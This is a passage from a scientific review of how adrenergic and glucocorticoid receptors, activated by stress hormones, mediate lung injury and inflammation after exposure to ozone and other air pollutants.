Adrenergic receptors (ARs) and glucocorticoid receptors (GRs) are activated by circulating catecholamines and glucocorticoids, respectively. These receptors regulate the homeostasis of physiological processes with specificity via multiple receptor subtypes, wide tissue-specific distribution, and interactions with other receptors and signaling processes. Based on their physiological roles, ARs and GRs are widely manipulated therapeutically for chronic diseases. Although these receptors play key roles in inflammatory and cellular homeostatic processes, little research has addressed their involvement in the health effects of air pollution. We have recently demonstrated that ozone, a prototypic air pollutant, mediates pulmonary and systemic effects through the activation of these receptors. A single exposure to ozone induces the sympathetic–adrenal–medullary and hypothalamic–pituitary–adrenal axes, resulting in the release of epinephrine and corticosterone into the circulation. These hormones act as ligands for ARs and GRs. The roles of beta AR (βARs) and GRs in ozone-induced pulmonary injury and inflammation were confirmed in a number of studies using interventional approaches. Accordingly, the activation status of ARs and GRs is critical in mediating the health effects of inhaled irritants. In this paper, we review the cellular distribution and functions of ARs and GRs, their lung-specific localization, and their involvement in ozone-induced health effects, in order to capture attention for future research.
Introduction
Circulating stress hormones are ligands for adrenergic receptors (ARs) and glucocorticoid receptors (GRs), ubiquitously distributed in the body; they are essential for responding to stress signals, orchestrating stress responses, and maintaining the homeostatic physiological function of major organ systems. In the lungs, these receptors have key roles in bronchoconstriction, microvascular contractility, maintaining immune surveillance, and alveolar patency [1,2]. Thus, it is conceivable that air pollution exposure, which causes irritation, alteration in breathing, and subsequent inflammation, directly or indirectly involves the activity of these receptors. However, until recently, only a few studies have examined the role of ARs or GRs in mediating the health effects of air pollution [3][4][5][6][7]. Some studies have assessed the contributions of ARs to pulmonary inflammation [8], whereas others have examined their role in the cardiovascular health effects of air pollutants [9]. Likewise, the contribution of GRs has also been examined in a limited number of air pollution studies [10]. This is despite the extensive therapeutic manipulation of these receptors for major chronic lung diseases, such as asthma and chronic obstructive pulmonary disease (COPD) [11]. For both diseases, the first-line therapy involves the use of beta-2 AR (β 2 AR) agonists as bronchodilators and steroidal GR agonists as immunosuppressants, which function to inhibit lung inflammation [12,13]. As AR and GR agonists have lifesaving therapeutic implications for lung diseases, their involvement in orchestrating and resolving lung injury and inflammation after air pollution exposure warrants further attention.
Our recent studies have examined the roles of these receptors in mediating ozoneinduced lung injury and inflammation where ozone has been used as a prototypic air pollutant. We have shown that the activation of these receptors is necessary in mediating pulmonary injury and inflammation after ozone exposure (Figure 1) [4][5][6][7]14,15], and believe that they will have much broader implications for the health effects of air pollution. The goal of this paper is to discuss the critical contribution of ARs and GRs in the acute pulmonary effects of ozone, and we propose integrating the potential roles of these receptors in future studies involving other air pollutants. First, we will provide a general perspective on the functions and distribution of AR and GR subtypes, their involvement in homeostasis, and cellular signaling resulting from changes in circulating ligands for these receptors. Then, we will focus on the distribution of ARs and GRs in the lungs, and their relevance in chronic cardiopulmonary diseases. Based on the roles of ARs and GRs in the lungs, we will explain how ozone exposure leads to increased activity of these receptors. We will discuss how ARs' and GRs' cellular signaling may be involved in modulating pulmonary injury, vascular leakage, inflammation and even circadian changes through their activation. Finally, we will emphasize the importance of integrating the functions of these receptors in future air pollution studies examining mechanisms of pulmonary injury, inflammation, therapeutic interventions, and a potential link to altered diurnal rhythmicity. Upon inhalation, air pollutants likely activate autonomic sensory nerves, which relay stress signals to the hypothalamus though the brainstem. This stimulates the hypothalamus to induce changes in the neuroendocrine pathways, including the activation of SAM and HPA axes, which results in release of catecholamines, such as epinephrine, and cortisol/corticosterone, into circulation. These hormones mediate their effects through widely distributed receptors for catecholamines (ARs) and glucocorticoids (GRs). These receptors-in addition to mediating homeostatic changes in physiological processes, and diurnal variations-respond to air pollution stress and direct bodily immune and metabolic responses at the site of injury. These processes result in a local inflammatory response that is governed by multiple organs, including the brain. IL-6: interleukin 6; TLR2: toll-like receptor 2; TLR4: toll-like receptor 4.
ARs and GRs, Their Subtypes, and Roles in Homeostatic Functions
Adrenal-derived catecholamines (epinephrine and norepinephrine) and glucocorticoids that are released in the blood in response to stress maintain vital homeostatic functions through binding to their receptors-ARs and GRs, respectively [16][17][18]. The stress signal, perceived or physiological, conveyed through the autonomic sensory nerves or generated within the central nervous system (CNS), leads to hypothalamic sympathetic activation, which initiates the body's response through the activation of the neuroendocrine system [19]. The activation of sympathetic nerves with wide cellular distribution among different organs releases norepinephrine (NE) at nerve terminals, which, in a paracrine manner, bind to ARs on effector cells in order to mediate immediate changes in cellular function in response to stress [20]. The other important function of sympathetic nerves, which innervate the adrenal medulla, is to mediate the synthesis and release of epinephrine and norepinephrine into circulation through the sympathetic-adrenalmedullary (SAM) axis ( Figure 1) [21]. On sympathetic activation, the adrenal medulla releases catecholamines-endogenous ligands with differing affinities for AR subtypes. The activation of the sympathetic nervous system in response to stress is also associated with hypothalamic release of corticotropin-releasing hormone through portal circulation to the anterior pituitary, which then stimulates the synthesis and release of adrenocorticotropic hormone into systemic circulation [22]. Once released, this hormone stimulates the synthesis and release of corticosteroids (referred as cortisol in humans and corticosterone in rodents) and mineralocorticoids into circulation through the hypothalamic-pituitaryadrenal (HPA) axis. Cortisol and mineralocorticoids released into circulation then bind to GRs and mediate cellular responses to stress ( Figure 1) [23,24]. Impairment of the SAM and HPA axes has been linked to a wide array of neuropsychiatric conditions, and even chronic peripheral diseases [16,17].
Through varied subtypes, cell-and tissue-specific distribution, and substrate specificities, as well as transcriptional and translational modifications, ARs and GRs maintain diurnal and stress-induced cardiovascular, respiratory, metabolic, and immune functions [1,25]. The diversity of the receptor subtypes, the plasticity of their function, and their cooperativity with other signaling regulators, along with variations in their distribution density at organ and cellular levels, enable precise and coordinated response tailored to a stressor in a cell-and organ-specific manner. The oscillatory and diurnal pattern of release of these hormones enables temporal regulation of normal cellular physiological functions, whereas stress-induced increases are critical to cellular changes that enable the cellular response to be phenotypically expressed in a reversible manner [26,27].
The two major types of AR, alpha and beta (αARs and βARs), each having several different subtypes, mediate the peripheral and central effects of catecholamines [28]. α 1 ARs, with affinity for both epinephrine and norepinephrine, are widely distributed in smooth muscles, where they mediate contraction [29]. α 2 ARs, on the other hand, are mostly presynaptic for adrenergic and cholinergic nerve terminals, and they counteract the sympathetic effects of smooth muscle contraction (Table 1) [29]. β 1 ARs, with similar affinity between epinephrine and norepinephrine, are distributed predominantly in the heart and kidney muscles, where they induce muscle contraction to increase heart rate and renin release in glomerular cells (reviewed in [30]). β 2 ARs are widely distributed in the respiratory, vascular, and uterine smooth muscles, where they increase relaxation, regulate fluid balance, and influence inflammatory responses, and in the liver they mediate glucose release. β 3 ARs are predominant in adipose tissue and the bladder wall, where they increase adipose lipolysis and relax the bladder muscle, respectively [31]. Table 1. Adrenergic (AR) and glucocorticoid (GR) receptor subtypes and their substrate preferences, tissue distribution, and cellular functions. AR and GR subtypes have been well characterized, and are widely manipulated therapeutically. Their wide but selective tissue distribution, efficacy for ligands, and receptor-subtype-specific functionality are critical in maintaining temporal and dynamic changes in biological processes to regulate homeostasis. EPI: epinephrine; NE: norepinephrine; CNS: central nervous system; SNS: sympathetic nervous system. [25] GR-α (a predominant GR and, thus, generally referred to as GR), with various splice forms, is universally distributed in all cells/organs, and is activated by cellular glucocorticoids to induce tissue-specific metabolic and immune changes through genomic and nongenomic mechanisms [25,34]. Less widely distributed GR-β is located in the nucleus, and antagonizes the transcriptional activity of GR-α through varied mechanisms [25]. GR activation suppresses the immune response by directly inhibiting the gene expression of proinflammatory mediators [31]. In some instances, glucocorticoid-bound GRs can also act through nongenomic mechanisms to affect cellular function [35]. Precise regulation of the downstream effects of GR activation is achieved through various posttranscriptional alterations, regulatory processes, and cooperativity with other transcription factors within the nucleus.
Cellular Signaling through Activation of ARs
Epinephrine and norepinephrine released into circulation from adrenal glands and nerve terminals activate ARs, which are G-protein-coupled receptors (GPCRs) to induce cellular changes in tissues, including lung ( Figure 2) [36,37]. Catecholamine binding to ARs mediates rapid muscle contraction or relaxation [38], increases heart rate [39], and stimulates adipose lipolysis [40]. The activation of ARs through these ligands initiates a cascade of events involving distinct G proteins subsequently producing second messengers [41,42]. Nine subtypes of αARs and βARs (α 1 a, α 1 b, α 1 c, α 2 a, α 2 b, α 2 c, β 1 , β 2 , and β 3 ) have specific ligand-binding properties, and involve different but coordinated regulatory mechanisms [43]. α 1 ARs are G-protein-aq (G aq )-coupled, and phosphorylate protein kinase C, which mediates the production of inositol triphosphate (IP3) and diacylglycerol ( Figure 2). These increases in second messengers enhance the intracellular release of free calcium, causing further activation of protein kinase C, which is involved in multiple signaling mechanisms [29]. α 2 ARs, when bound to ligands, couple with G protein ai (G ai ), and exert autoinhibitory effects by decreasing protein kinase A (PKA) and inhibiting the production of cyclic AMP (cAMP) by adenylate cyclase and, thus, counteracting the effects of α 1 AR [29]. The right panel shows cell signaling through α 1 AR and β 2 AR. β 2 AR signaling involves cAMP-mediated activation of PKA through phosphorylation, and effects on transcription factors that mediate the expression of genes regulating bronchodilation, inflammation, and epithelial transport. α 1 AR signaling, on the other hand, leads to increases in intracellular free calcium though the activation of phospholipase C and diacylglycerol, where the activation of PKC causes pulmonary vasoconstriction. β 2 AR: beta 2 adrenergic receptors; α 1 AR: alpha 1 adrenergic receptors; ATP: adenosine triphosphate; cAMP: cyclic adenosine monophosphate; PKA: protein kinase A.
On the other hand, βARs are G-protein-as (G as )-coupled, and involve the activation of protein kinase A (PKA) through stimulation of adenylate cyclase and cAMP production. The binding of hormone ligands to β 1 AR leads to the production of a number of second messengers that are involved in the downstream activation of transcription factors. cAMP-dependent protein kinase A phosphorylates calcium channels, leading to increased concentrations of intracellular calcium, facilitating contraction of the myosin light chain and, thus, the contractility of muscle cells [30]. The activity of β 2 AR-mediated PKA signaling in airway smooth muscle cells involves other proteins, such as phospholipase C, myosin light-chain kinase (MLCK), IP3, calcium channels, and heat shock protein 20, which, when phosphorylated, inhibit signaling that leads to smooth muscle contraction ( Figure 2) (reviewed in [33]). β 2 AR may also coordinate with reduced nicotinamide adenine dinucleotide phosphate (NADPH) oxidase through PKA and β-arrestin to mediate oxidative stress [44].The activation of GPCR G as by ligand binding to βARs leads to its phosphorylation by kinases, facilitating binding of one of the four β-arrestins to the complex [45]. A cascade of events follows, leading to autoregulation of further activation, preparation of the receptor complex for internalization, and activation of other signaling pathways, such as extracellular signal-regulated kinases (ERKs) [46]. βARs also complex with G protein bg (G bg ) to induce intracellular signaling and mediate functions of ion channels, as well as the activation of phospholipase C and G protein receptor kinase [47]. In addition to these canonical pathways that mediate signaling to induce second messenger activation, βARs also mediate signaling that does not involve G proteins and subsequent cAMP production. For example, β 2 AR can activate the glycogen synthase kinase 3b signaling pathway, which involves serine/threonine protein kinase (AKT) [48], while β 1 AR can also mediate signaling through other kinases, including mitogen-activated protein kinase (MAPK) and stress-activated protein kinase (SAPK), to induce transcriptional changes [49]. The activation of GPCRs and production of second messengers are regulated temporally based on diurnal cycle, and spatially to mediate diverse cellular changes [50]. Moreover, there is an oscillatory pattern of changes in AR-mediated second messenger production, leading to differential amplitude and frequency of their actions, which may program temporally different downstream responses based on diurnal cycle [51].
Cellular Signaling through Activation of GRs
Increases in circulating free lipophilic glucocorticoids lead to their cellular entry, binding to GRs and mediating a series of events leading to their nuclear translocation, binding to gene sequences at many different sites, and influencing the expression of a major pool of genes ( Figure 3). The bioavailability of intracellular glucocorticoids is regulated by 11βhydroxysteroid dehydrogenase 1, which converts glucocorticoids to cortisone, an inactive form, whereas 11β-hydroxysteroid dehydrogenase 2 converts cortisone to corticosterone or cortisol [52]. The spatial and cellular distribution of these enzymes can control the availability of glucocorticoids to bind to GRs. On binding to GRs, glucocorticoids at physiological levels regulate immune and metabolic homeostasis; however, under acute stress, glucocorticoids also can act to increase proinflammatory mediators when concentrations reach critical levels [53,54]. As reviewed by Oakley and Cidlowski [25], GRs constitute a major class of nuclear transcription factors, and are estimated to regulate about 10-20% of the human genome.
Human GRs are encoded by NR3C1, where 13 variants of axon 1 harbor binding sites for numerous transcription factors, including binding for GRs themselves, which enables tight regulation of their own expression. Axon 1 of NR3C1 is also regulated by epigenetic modifications (reviewed in [13]). By transcriptionally regulating the expression of thousands of genes (transactivation and transrepression), the specificity of GRs is achieved by their different splice variants and context-specific regulation. Cytosolic GRs, in the absence of glucocorticoids, exist as monomers complexed with other chaperone proteins, aiding to their maturation for transcriptional activity. On binding to glucocorticoids, GRs complexed with a number of proteins that are replaced by FK506-binding protein 51 (FKBP51) and p23 chaperone protein, preparing complexes for nuclear translocation and DNA binding [13]. In addition to binding of GR homodimers to palindromic sequences on DNA (glucocorticoid response elements; GREs), GR complexes can also be exported back to the cytoplasm as another regulatory control of its transcriptional activity [55]. GR homodimer binding to GREs directly activates transcription of genes (transactivation) or silencing of transcription (reviewed in [13]). GRs can also partner with other transcription factors to modulate changes in gene transcription, including activator protein 1 (AP-1), nuclear factor kappa B (NF-κB), and signal transducers and activators of transcription (STAT). By transactivation and by interacting with AP-1 and NF-κB, GRs increase expression of proinflammatory genes. Through interaction of GREs with the STAT family of transcription factors, GRs enhance the transcriptional activity of genes regulated by this transcription factor (reviewed in [25]). A schematic of lung cellular effects from activating GRs. Lipophilic glucocorticoids enter cells freely. Upon entering cells, glucocorticoids bind to GRs, which exist in the cytoplasm complexed with heat shock proteins 70 and 90 (Hsp70 and Hsp90), p23, and other proteins, such as steroid receptor coactivator (SRC). Upon binding to glucocorticoids, other proteins are recruited in the complex, preparing it for nuclear translocation. Once in the nucleus, GRs recruit P300/CBPassociated factor (pCAF), CREB-binding protein (CBP), and histone acetyltransferase (HAT), allowing complex to modify the chromatin framework and bind to glucocorticoid response elements (GREs) in promotor sequences of DNA. This results in transactivation or transrepression, leading to activation or inhibition of gene transcription. This is achieved through the direct binding of the GR complex to GREs and/or its interaction with other transcription factors (some details are not given in the figure for simplicity). Through their transcriptional regulation of gene expression, GRs change the expression of genes involved in inflammation, acute-phase response, and antiinflammatory mechanisms. GILZ: glucocorticoid-induced leucine zipper; MT-1: metallothionein-1; SGK: serine/threonine-protein kinase.
The effects of GR activation on gene expression are diverse, and regulated by complex cytoplasmic and nuclear signaling processes, which are central to producing the needed proteins involved in orchestrating dynamic cellular physiological response to stress. GRs have been shown to interact with NF-κB in the cytosol of rat liver cells through nongenomic mechanisms. To suppress the nuclear translocation of NF-κB, cytosolic GRs, even without ligand binding, physically interact with p65/p50 and IκB subunits [56,57]. Inflammatory stimuli upregulate MAPK-associated pathways, activating stress-responsive proteins, glucocorticoid-induced leucine zipper (GILZ, also known as TSC22d3), MAPK phosphatase-1, and annexin-1 [56]. Moreover, MAPK phosphatase-1 and annexin-1 suppress the MAPK pathway to decrease the inflammatory response [58,59]. GR binding to glucocorticoids has been shown to modulate other cellular processes that are not regulated by genomic mechanisms; for example, GRs induce changes in membrane configuration, alter MAPK signaling through the GR-binding proteins, and regulate the transcription of mitochondrial genes [60].
Plasticity in GR-mediated biological processes is complex and influenced by multiple regulatory impacts on its activity [17]. Posttranslational modifications of GR, including phosphorylation, ubiquitination, and acetylation, can also modulate GR activity. In addition, a single base pair change in the GRE binding consensus DNA sequences can change the binding capacity of GRs [61]. The accessibility of GRs to specific GREs is also regulated by the chromatin landscape and DNA-binding proteins in given cell types, where GREs that are easily accessible to GRs are thought to be occupied at low concentrations of glucocorticoids, giving another option for concentration-dependent differences in the types of genes being activated. These multiple controls on the transcriptional activity of GRs enable plasticity in regulating homeostatic physiological processes (reviewed in [13,25,62]).
Distribution of AR and GR Subtypes in the Lungs
Conducting airways, parenchyma, pulmonary vasculature, and epithelial cells selectively express AR and GR subtypes that are essential in maintaining the homeostatic function of the lungs [1]. α 1 ARs are expressed in pulmonary and vascular smooth muscle cells, and mediate vasoconstriction [63]. Of all ARs, βARs are distributed more abundantly and widely in various cells of the lungs. They are expressed in vessel walls, airway smooth muscles, submucosal glands, and on distal airways and alveolar walls [1,64]. β 2 ARs make up approximately 70% of all pulmonary βARs [65]. β 2 ARs are specifically present in airway, vascular smooth muscle, and epithelial cells, whereas β 1 ARs are primarily localized in alveolar walls and submucosal glands. In the alveolar walls, β 1 ARs are more abundant when compared with β 2 ARs [1]. β 2 ARs have been shown to play a role in alveolar fluid clearance, as well as immune surveillance [65,66]. When activated by its ligands, such as epinephrine or other beta-agonist drugs, β 2 ARs cause an increase in intracellular cAMP and calcium channel activation to cause smooth muscle relaxation and bronchodilation ( Figure 2) [67]. In the lungs, capsaicin sensory nerves and mast cells also express β 2 ARs. Their expression in other immune cells in the lungs is relatively less abundant [1]. Although other immune cells in the lungs express low levels of β 2 ARs, they are also expressed in pulmonary cells, predominantly in airways and endothelial cells [68,69]. β 3 ARs present in pulmonary vascular smooth muscle are known to cause vasodilation of the pulmonary artery influencing cAMP-dependent pathway [69][70][71]. However, the underlying mechanisms by which each AR subtype modulates the pulmonary effects of air pollutants remain largely unelucidated.
GRs (GRαs) have much wider tissue distribution throughout the body, including the lungs. All structural and immune cells within the lungs express GRs, but likely with differential density and different coregulatory mechanisms to enable cell-specific effectiveness of glucocorticoids [1]. It has been suggested that the endothelial and pulmonary epithelial cells, which readily secret proinflammatory mediators, may express GRs more abundantly than other cell types, which have specific roles in maintaining homeostatic immune regulation at the air-liquid interphase [1]. In asthmatic lungs when compared to healthy, GRs are distributed much more widely among smooth muscle cells, fibroblasts, and macrophages, and may play a role in controlling overly activated inflammatory responses [72]. Because GRs are also distributed widely in other organ systems, inhaled steroids are used to reduce the local pulmonary inflammatory response without causing systemic effects in patients with asthma and COPD. The majority of GR subtypes in tissues are GRαs. GRβs, which antagonize the effects of GRαs, are present in relatively low levels in tissues, and are sparsely distributed in the lungs. It has been shown that steroid-resistant asthma patients have increased expression of GRβs [73].
ARs and GRs are prime therapeutic targets for treating pulmonary and cardiovascular diseases. β 2 AR agonists are used in patients with COPD and asthma, whereas antagonists of β 1 AR are used for hypertension and more advanced cardiac complications, such as heart failure [74][75][76]. The therapeutic use of GR agonists can greatly reduce the inflammatory response, both in the lungs and systemically [77]. Generally, the combination of β 2 AR agonists and glucocorticoids is prescribed to asthma and COPD patients in order to promote bronchodilation and reduce inflammation [78]. Because irritant pollutants induce increases in circulating endogenous epinephrine and glucocorticoids, which function as ligands for ARs and GRs, respectively, the understanding of AR and GR signaling in pulmonary and cardiovascular diseases can aid in determining their roles in modulating pulmonary and cardiovascular responses to inhaled air pollutants.
ARs and GRs in Air-Pollutant-Induced Lung Injury and Inflammation
When inhaled, physiochemically diverse pollutants produce local cellular changes and activate cell signaling pathways that promote cell injury, proinflammatory cytokine release, and oxidative cell changes, leading to immune cell extravasation to the pulmonary tissue [79,80]. Although local pulmonary cellular changes have been characterized extensively with acute exposure to different pollutants, the mechanisms by which the immune response is activated and immune cells are recruited from lymphoid organs, matured, and extravasated to the site of injury are not well understood. Our recent studies have shown that the adrenergic and glucocorticoid pathways are involved in pulmonary vascular leakage and inflammatory response induced by irritant pollutants, such as ozone [14,81,82]. In light of recent research into the marked effects of air pollutants on the brain [7,[82][83][84], and the involvement of the neuroendocrine system with increased adrenal-derived stress hormones [85], it is conceivable that AR and GR activation are involved in the health effects of air pollution. Understanding the roles of these receptors may explain how a pulmonary inflammatory response is generated after exposure to air pollutants, why there is tolerance or adaptation to this initial pulmonary response, how individuals with psychosocial disorders and altered neuroendocrine regulation may be more susceptible, and what systemic mediators are critical for initial injury and inflammation.
Air Pollution Studies Implicating the Role of ARs
Epidemiological studies have highlighted that polymorphisms in β 2 AR, especially Arg16, increase the risk of airway hyperresponsiveness in asthma, decrease forced expiratory volume in one second (FEV 1 ), and impair overall lung function [86,87]. Particulate matter (PM) exposure in dogs induces peripheral vascular resistance via αAR activation. This effect is attenuated with the αAR antagonist, prazosin [88]. Moreover, a number of epidemiological studies have implicated increases in stress hormones and exposure to air pollutants [89][90][91], which may involve their effects on ARs, GRs, and downstream cellular changes ( Table 2). Table 2. Selected respirable particulate matter (PM) and acrolein studies incorporating the roles of adrenergic receptors (ARs) and glucocorticoid receptors (GRs) and/or their endogenous ligands-catecholamines and glucocorticoids, respectively. Only the data pertaining to ARs and GRs are summarized in the table. * There are a number of cigarette smoke and other studies that have implicated the contribution of ARs and GRs to observed health effects, but only one example is provided. LPS: lipopolysaccharides; PM: respirable particulate matter; NF-κB: nuclear factor kappa B; IL-6: interleukin 6; NO 2 : nitrogen dioxide.
Pollutant Type Model System Receptor Subtype Study Design and Outcome Reference
Ambient PM Human trial Endogenous ligands for ARs and GRs PM exposure increased cortisol, epinephrine, norepinephrine, and changed glucose and lipid metabolites in serum. [89] Ambient NO 2 (Traffic) Epidemiology Endogenous GR ligand NO 2 but not PM exposure was associated with increased morning cortisol in plasma. [90] Ambient pollutants Epidemiology Endogenous AR ligand Ambient pollution was associated with increases in urine catecholamines. [91] Ambient PM Dog αARs Dogs exposed to ambient PM through tracheal tube had increased blood pressure, and this PM effect was inhibited by αAR antagonists. [88] Cigarette smoke * Lung epithelial cell line Suppression of inflammatory cytokine production through β-arrestin signaling was linked to βARs and inhibition of autophagy through AMPK in cigarette-smokecondensate-exposed cells. [92] LPS Macrophage cell line β 2 AR and β-arrestin β 2 AR negatively regulated NF-κB by β-arrestin 2, and through stabilizing the NF-κB/IκB-α complex. [93] Ambient PM Mice in vivo, and human macrophages β 2 AR and its ligand PM exposure in mice increased circulating catecholamines and macrophage IL-6 release. In human macrophages, β 2 AR agonists increased-and antagonists decreased-IL-6 production. [8] Acrolein
Rat Endogenous ligands for ARs and GRs
Acrolein inhalation increased corticosterone and epinephrine in Wistar and diabetic Goto-Kakizaki rats, which were associated with nasal injury and inflammation. [94] Ambient PM Adra2b-transgenic mice α2AR Concentrated PM exposure increased blood pressure, and anxiety-like behavior, which was associated with upregulation of inflammatory genes in the brains of Adra2b-transgenic mice, overexpressing α 2 bAR. [95]
Diesel exhaust Endothelial cells βARs
In endothelial cells, diesel exhaust extract increased inflammatory cytokines' release, and this effect was inhibited by βARs and calcium channel inhibitors in an extract-specific manner. [3] Ambient PM Rat microvessels, ex vivo αARs Microvessels isolated from PM-exposed rats had inhibited endothelium-dependent arteriolar dilation. αARs inhibited PM effects. [96] Ambient air pollution Humans and mice Endogenous ligands for GRs Exposure to air pollution was associated with increased plasma cortisol in humans and corticosterone in mice. In mice, PM increased hippocampal inflammation and inhibited GR expression. [97] Metal mixture Mouse macrophage cell line GR activation GR activity was inhibited by selected metals, as indicated by reporter luciferase assay. [98] Ambient PM Rat GRs Increased expression of genes regulated by activation of GRs in multiple tissues, including lung. [99] The contributions of β 2 AR signaling to cigarette-smoke-, lipopolysaccharide (LPS)-, and other pollutant-induced lung injury and inflammation have been examined in few experimental studies. β 2 AR signaling through GPCR-kinase-mediated phosphorylation and binding to β-arrestin can influence inflammatory cell signaling. Given the contribution of β-arrestin 2 activation to inhibiting autophagy via the adenosine monophosphate-activated kinase (AMPK)/mammalian target of rapamycin (mTOR) pathway, and the suppression of inflammatory cytokine production in human bronchial epithelial cells (BEAS-2B) exposed to cigarette smoke [92], it will be important to determine how the activation of β 2 AR after air pollution exposure may contribute to inflammation in the lungs through β-arrestin. In human blood monocytes, activation of βAR subtypes by isoproterenol repressed the LPSinduced secretion of inflammatory cytokines, such as TNF-α and IL-6 [100]. In the same manner, immunosuppression through inhibiting the NF-κB pathway occurred in bonemarrow-derived macrophages with norepinephrine binding to ARs [93]. β 2 AR's interaction with toll-like receptors has been shown to cause immunosuppression through upregulation of anti-inflammatory gene expression [101]. The inhibitory effects of βAR agonists on immune response have been shown to occur through the negative regulation of type 2 innate lymphoid cells [102]; however, when the β 2 AR transgene was overexpressed in gene knockout or in wild-type mice, the proinflammatory phenotype was exacerbated [103]. Thus, although the evidence for β 2 AR's involvement in immunosuppression is substantial [104], the recent evidence suggests its contribution to promoting innate inflammatory responses through increased IL-6 production [8]. Experimentally, it has been shown that acute exposure to air pollutants, such as ozone and acrolein, activates the sympathetic nervous system, causing local and systemic secretion of catecholamines [8,14,94,105]. The activation of β 2 AR by agonists potentiates pulmonary inflammatory responses through exacerbating macrophage release of IL-6 [8]. The activation of β 2 AR in alveolar macrophages by ambient PM was demonstrated to induce the release of mitochondrial reactive oxygen species and phosphorylation of the cAMP-response-element-binding protein (CREB) to increase IL-6 transcription [8]. Recently, Richie et al. [106] have also shown that increased IL-6 production by β 2 AR agonists in cells infected with respiratory syncytial virus involved the cAMP response element (CRE). Moreover, overexpression of α 2 bAR (Adra2b) in transgenic mice resulted in increased gene expression of Il-6, Tlr2, and Tlr4, enhancing inflammation in the brain following PM exposure [95].
The involvement of ARs has been shown in other air pollution studies examining cardiovascular effects. Increases in intracellular free calcium in endothelial cells after exposure to diesel exhaust particles were shown to involve βARs [3]. In a rat model of acute myocardial infarction, exposure to particulate matter resulted in exacerbation of injury, while treatment with metoprolol, a β 1 AR-specific blocker, reduced the effect [9]. The vasoconstriction response observed in isolated microvessels from PM-exposed rats was inhibited by αAR blockade [96]. Thus, some studies have emphasized the role of different AR subtypes in mediating pulmonary and cardiovascular effects of air pollutants; however, the cellular mechanisms, and how pollutant exposure results in increased circulating ligands for ARs, are just beginning to emerge. Although the role of sympathetic activation in mediating cardiovascular effects has been established [107,108], and epidemiological studies have shown associations between circulating catecholamines and air pollution [91], the mechanisms of central regulation mediating the release of catecholamines responsible for activating ARs have yet to be demonstrated in ambient PM studies.
Air Pollution Studies Implicating the Role of GRs
As a few studies have implicated the involvement of ARs in mediating inflammatory responses in the lungs after air pollution exposure, even fewer studies have examined the role of GRs (Table 2). This is despite significant evidence that air pollution may induce resistance to inhaled glucocorticoids in patients with asthma and COPD [109]. Jia et al. [97] reported that the levels of cortisol were increased in humans exposed to air pollutants, and this effect was recapitulated in mice after exposure to heavy air pollution, and was associated with hippocampal inflammation as well as behavioral alterations. These studies imply that glucocorticoids are likely involved, and mediate their effects centrally through the activation of GRs. The endocrine-disrupting effects of metals were examined in vitro using different cell lines, including mouse macrophage cells using reporter luciferase assay for GR activation [98]. This study showed that GR activity was inhibited by selected metals. The effects of PM exposure on multiple organs, including the lungs, were linked to increased glucocorticoid activity in rats [99]. Although these studies show the involvement of GRs in mediating the acute effects of PM, it is not known how these receptors may be activated, or what coregulatory mechanisms are involved in mediating pulmonary vascular leakage and inflammation secondary to peripheral changes in immune cells. The understanding of the mechanisms by which air pollutants stimulate the SAM and HPA stress axes, and their contribution to individual susceptibility variations though GRs, could inform mitigation and therapeutic strategies.
ARs and GRs in Ozone-Induced Lung Injury and Inflammation
The strongest evidence for the role of catecholamines and glucocorticoid activation of ARs and GRs in mediating pulmonary injury and inflammation comes from our acute ozone inhalation studies [5][6][7]. Although the mechanisms of ozone-induced lung injury and inflammation are well characterized, the evidence that ozone exposure leads to increases in epinephrine and corticosterone in rats [14,105] and cortisol in humans [110] suggests that the receptors of these stress hormones are likely involved in mediating ozone's effects [111]. A number of our recent studies have demonstrated the contribution of ARs and GRs to mediating ozone-induced lung injury and inflammation (Table 3). Ozone was used as a prototypic air pollutant known to induce oxidant injury in the lungs [112], and is not likely to translocate systemically, allowing us to test the contribution of the neuroendocrine system without direct effects in the periphery [80]. Below is an account of a series of studies that emphasized the role of ARs and GRs in mediating ozone's effects. Table 3. Selected experimental studies involving ozone and the roles of adrenergic receptor (AR) and glucocorticoid receptor (GR) subtypes and/or their endogenous ligands-catecholamines and glucocorticoids, respectively. This table is not meant to be a comprehensive list of all experimental studies that mention ARs and/or GRs; rather, ozone studies focused on the lungs and addressing the roles of ARs and GRs and their endogenous ligands are listed.
Human Endogenous ligands for GRs
In a clinical study, ozone exposure increased plasma levels of cortisol, which was associated with increased lipid metabolites [110] Rat Endogenous ligands for ARs Epinephrine level increased in rats immediately after ozone exposure, and this was associated with lung injury inflammation and lymphopenia. [14,105] Rat
Endogenous ligand manipulation for ARs and GRs
Adrenal demedullation diminished circulating epinephrine, and total adrenalectomy diminished both epinephrine and corticosterone. This was associated with inhibition of ozone-induced lung injury, inflammation, lymphopenia, and lung expression of genes involved in AR and GR signaling, acute-phase response, hypoxia, and inflammation. [4,113,114] Rat β 2 AR and GR agonists, individually or in combination Pretreatment of rats with β 2 AR agonists exacerbated ozone-induced lung injury and inflammation. GR agonists, but not β 2 AR agonists, exacerbated ozone-induced lymphopenia. Combination treatment exacerbated both lymphopenia and lung effects, including gene expression of inflammatory markers and GR-responsive targets, in both sham and adrenalectomized rats. [4,6,15] Rat βAR and GR antagonists βAR antagonists suppressed ozone-induced lung vascular leakage and neutrophilia, while GR antagonists reversed lymphopenia but not lung neutrophilia. The combination of both antagonists inhibited all ozone-induced effects. [5]
Rat Endogenous ligands of ARs and GRs in brain effects
Depletion of circulating endogenous ligands, epinephrine, and corticosterone by adrenalectomy inhibited ozone-induced changes in gene expression within the brainstem and hypothalamus. This was associated with the reversal of ozone-induced decreases in circulating prolactin, luteinizing hormone, and thyroid-stimulating hormone. [7]
Rat Endogenous ligands for ARs and GRs
Over a 4-h period of ozone exposure, circulating epinephrine and corticosterone increased. These increases were followed by the depletion of circulating granulocytes, M1 monocytes, B and T lymphocytes, and lung expression of GR-regulated genes. Only small changes occurred in circulating cytokines. [85]
Rat Endogenous ligands for GRs
Ozone exposure increased corticosterone in lung lavage fluid and inhibited alveolar macrophage cytokine production. The stress-sensitive Fischer 344 strain exhibited greater effects than those of stress-resistant Lewis rats. Inhibiting corticosterone production increased inflammatory cytokine expression in macrophages. [115]
Adrenalectomy Inhibits Lung Injury and Inflammation Induced by Acute Ozone Exposure
